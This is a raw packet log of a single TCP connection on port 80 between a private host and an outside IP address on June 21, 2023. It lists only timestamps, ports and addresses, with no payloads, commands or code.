Jun 21, 2023 04:27:36.282578945 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.282603979 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.324942112 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.332489967 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.387361050 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.410729885 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.410793066 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.410840988 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.410845995 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.410888910 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.410934925 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.411710024 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.411758900 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.411803961 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.411806107 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.411854029 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.411894083 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.412767887 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.412818909 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.412862062 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.412863970 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.412911892 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.412955046 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.413517952 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.413566113 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.413613081 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.413624048 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.413656950 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.413702011 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.413702011 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.414618015 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.414670944 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.414685965 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.414719105 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.414766073 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.414767027 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.415632010 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.415679932 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.415707111 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.415728092 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.415776014 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.415777922 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.415824890 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.415874004 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.416531086 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.416585922 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.416644096 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.416675091 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.416778088 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.416821003 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.417489052 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.417537928 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.417584896 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.428945065 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429008961 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429056883 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429083109 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429105043 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429152966 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429155111 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429203033 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429250956 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429250956 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429300070 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429346085 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429347992 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429394007 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429440022 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429445028 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429487944 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429538965 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429555893 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429586887 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429640055 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429642916 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429692984 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429742098 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429744005 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429789066 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429835081 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429868937 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429881096 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429929018 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.429929972 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.429975986 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430023909 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430025101 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430072069 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430118084 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430120945 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430166006 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430212021 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430214882 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430260897 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430310011 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430310011 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430356026 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430403948 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430407047 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430450916 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430497885 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430499077 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430546999 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430593014 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430602074 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430644035 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430691957 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430701971 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430738926 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430788994 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430788994 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430836916 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430883884 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.430883884 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430932999 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430979967 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.430982113 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.431469917 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.431518078 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.431530952 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.431566000 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.431610107 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.431615114 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.432671070 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.432719946 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.432729959 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.432765007 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.432813883 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.432822943 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.433542967 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.433590889 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.433598042 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.433640957 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.433686972 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.433691978 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.433734894 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.433782101 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.434609890 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.434659958 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.434708118 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.434726954 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.434757948 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.434804916 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.435564995 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.435709953 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.435759068 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.435771942 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.435808897 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.435856104 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.469665051 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.469723940 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.469916105 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.543610096 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.543668032 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.543731928 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.561750889 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.561801910 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.561850071 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.561867952 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.562601089 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.562653065 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.562675953 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.562701941 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.562748909 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.562762976 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.562796116 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.562855959 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.564327002 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.564377069 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.564423084 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.564436913 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.564666033 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.564717054 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.564727068 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.564764023 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.564811945 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.564812899 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.564861059 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.564912081 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.565640926 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.565686941 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.565721035 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.565771103 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.565881968 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.565881968 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.574753046 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.574800968 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.574851036 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.574893951 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.574897051 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.574945927 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.574950933 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.574992895 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575038910 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575047016 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575087070 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575134039 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575145006 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575181961 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575228930 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575232983 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575275898 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575323105 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575328112 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575370073 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575416088 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575417995 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575464010 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575510025 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575516939 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575579882 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575630903 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575634956 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575678110 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575723886 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575727940 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575768948 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575818062 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575820923 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575865030 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575911999 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.575913906 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.575959921 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576008081 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576014042 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.576056004 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576101065 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576103926 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.576148987 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576194048 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576196909 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.576240063 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576304913 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576354980 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576401949 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576447964 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576476097 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.576476097 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.576494932 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.576494932 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576541901 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576594114 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576606035 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.576644897 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576692104 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576693058 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.576740980 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.576786995 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.576787949 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.577672958 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.577721119 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.577733994 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.577768087 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.577812910 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.577814102 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.577862024 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.577909946 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.578589916 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.578639030 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.578685999 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.578691006 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.578732014 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.578780890 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.578785896 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.579615116 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.579663038 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.579668999 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.579718113 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.579762936 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.579767942 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588423014 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588459969 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588486910 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588490009 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588521004 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588536024 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588556051 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588587046 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588603973 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588619947 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588648081 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588665962 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588679075 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588711023 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588723898 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588741064 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588769913 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588783026 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588799953 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588840008 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588840961 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588870049 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588898897 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588911057 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588928938 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588958025 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.588970900 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.588987112 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589025974 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589040041 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.589056015 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589092970 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589097977 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.589123011 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589150906 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589167118 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.589181900 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589214087 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589230061 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.589242935 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589272976 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589288950 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.589303017 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589332104 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589361906 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589363098 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.589391947 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589411974 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.589422941 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589452982 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589468002 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.589601040 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589632988 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589647055 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.589664936 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589694977 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.589720964 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.590591908 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.590624094 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.590648890 CEST	49699	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:36.590655088 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.590687990 CEST	80	49699	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:36.590751886 CEST	49699	80	192.168.2.3	37.34.248.24
